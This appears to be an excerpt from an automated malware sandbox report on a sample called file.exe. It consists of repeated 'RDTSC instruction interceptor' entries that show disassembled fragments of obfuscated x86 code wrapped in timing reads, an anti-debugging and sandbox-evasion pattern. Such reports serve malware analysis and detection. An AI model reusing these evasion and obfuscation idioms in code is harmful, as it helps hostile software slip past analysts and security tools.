              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0643D second address: F064C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F6E390E37F8h 0x0000000d mov dword ptr [ebp+122D379Ch], esi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F6E390E37E8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 jns 00007F6E390E37E6h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov dword ptr [ebp+122D1B94h], eax 0x00000047 mov eax, dword ptr [ebp+122D169Dh] 0x0000004d mov dword ptr [ebp+122D26BAh], esi 0x00000053 push FFFFFFFFh 0x00000055 mov edi, dword ptr [ebp+122D2AB0h] 0x0000005b push eax 0x0000005c jc 00007F6E390E37F2h 0x00000062 jl 00007F6E390E37ECh 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F091BD second address: F09203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E3947E05Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F6E3947E068h 0x00000015 ja 00007F6E3947E056h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6E3947E05Eh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0841E second address: F08448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F6E390E37E8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F093F8 second address: F09409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E3947E05Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B040 second address: F0B0C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F6E390E37E8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D2A94h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F6E390E37E8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 clc 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007F6E390E37F9h 0x00000052 jmp 00007F6E390E37F3h 0x00000057 popad 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A2EB second address: F0A30E instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E3947E058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F6E3947E082h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6E3947E05Eh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C09A second address: F0C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D2858h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F6E390E37E8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D3696h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F6E390E37E8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b js 00007F6E390E37E9h 0x00000051 movsx edi, di 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 pushad 0x00000057 jng 00007F6E390E37E6h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 jmp 00007F6E390E37EDh 0x00000065 popad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0CF92 second address: F0CF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F6E3947E056h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0CF9F second address: F0CFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C296 second address: F0C2AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C2AC second address: F0C2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EF00 second address: F0EF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D0A0 second address: F0D0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D0A4 second address: F0D0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D0A8 second address: F0D150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6E390E37F4h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f or bx, 622Dh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F6E390E37E8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 jmp 00007F6E390E37F8h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push ecx 0x00000042 mov edi, dword ptr [ebp+122D1A94h] 0x00000048 pop edi 0x00000049 mov eax, dword ptr [ebp+122D10F5h] 0x0000004f push edx 0x00000050 mov edi, dword ptr [ebp+122D2884h] 0x00000056 pop edi 0x00000057 push FFFFFFFFh 0x00000059 mov dword ptr [ebp+12474CE7h], ecx 0x0000005f nop 0x00000060 ja 00007F6E390E37EEh 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F6E390E37F1h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D150 second address: F0D154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0FF54 second address: F0FF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0FF5A second address: F0FFD9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov bh, 68h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F6E3947E058h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007F6E3947E063h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F6E3947E058h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c movsx ebx, bx 0x0000004f jo 00007F6E3947E05Ch 0x00000055 push ebx 0x00000056 mov bx, A7FFh 0x0000005a pop edi 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push ecx 0x0000005f push edi 0x00000060 pop edi 0x00000061 pop ecx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F10FB8 second address: F10FC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F6E390E37E6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F72 second address: F11F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6E3947E056h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F7D second address: F11F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F83 second address: F11F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F90 second address: F11F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F98 second address: F12012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Ah 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jnc 00007F6E3947E05Bh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F6E3947E058h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 cld 0x00000031 xchg eax, esi 0x00000032 js 00007F6E3947E062h 0x00000038 jg 00007F6E3947E05Ch 0x0000003e push eax 0x0000003f pushad 0x00000040 pushad 0x00000041 push edx 0x00000042 pop edx 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pushad 0x00000047 jmp 00007F6E3947E068h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F18E second address: F0F194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F10121 second address: F101CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F6E3947E058h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jns 00007F6E3947E05Ch 0x0000002a push dword ptr fs:[00000000h] 0x00000031 or dword ptr [ebp+122D2DE4h], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F6E3947E058h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov bx, cx 0x0000005b mov eax, dword ptr [ebp+122D1321h] 0x00000061 call 00007F6E3947E05Eh 0x00000066 mov dword ptr [ebp+122D2E6Dh], esi 0x0000006c pop ebx 0x0000006d push FFFFFFFFh 0x0000006f mov edi, ebx 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 jmp 00007F6E3947E062h 0x0000007c popad 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F12210 second address: F12215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1512C second address: F15136 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD0F second address: F1FD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD15 second address: F1FD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD1B second address: F1FD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F6E390E37E6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD28 second address: F1FD49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E067h 0x00000007 jp 00007F6E3947E056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD49 second address: F1FD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37EAh 0x00000009 jo 00007F6E390E37E6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F45C second address: F1F471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6E3947E05Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F6F6 second address: F1F71E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E390E37E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6E390E37F2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F6E390E37E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F71E second address: F1F722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F722 second address: F1F728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21371 second address: F21375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21375 second address: F2137B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2137B second address: F2138C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6E3947E056h 0x00000009 jl 00007F6E3947E056h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2138C second address: F213A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jng 00007F6E390E37E8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F6E390E3816h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F213A6 second address: F213BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E062h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F213BE second address: F213C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F213C4 second address: F213CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F269C1 second address: F269F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F6E390E37F9h 0x0000000c pop edx 0x0000000d jnc 00007F6E390E37EEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F269F9 second address: F26A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E31 second address: F27E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E36 second address: F27E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6E3947E056h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E40 second address: F27E73 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jns 00007F6E390E37F4h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6E390E37EBh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E73 second address: F27EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E3947E066h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27EAA second address: F27EB4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2815D second address: F28171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BBBE second address: F2BBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BBC6 second address: F2BBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BBCA second address: F2BBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C10F second address: F2C137 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b js 00007F6E3947E08Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F6E3947E063h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C268 second address: F2C28A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E390E37E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6E390E37F2h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C28A second address: F2C28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C28E second address: F2C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58956 second address: F5896C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37F2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E3B2 second address: F5E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E3B7 second address: F5E3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E987 second address: F5E9AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Fh 0x00000007 jnp 00007F6E3947E058h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E3947E05Bh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E9AF second address: F5E9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E9B5 second address: F5E9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F2A1 second address: F5F2B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F6E390E37E6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE0E second address: F5FE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007F6E3947E058h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE22 second address: F5FE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE28 second address: F5FE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600BE second address: F600C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600C6 second address: F600D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600D1 second address: F600D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600D5 second address: F600F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f ja 00007F6E3947E056h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC1641 second address: EC164B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
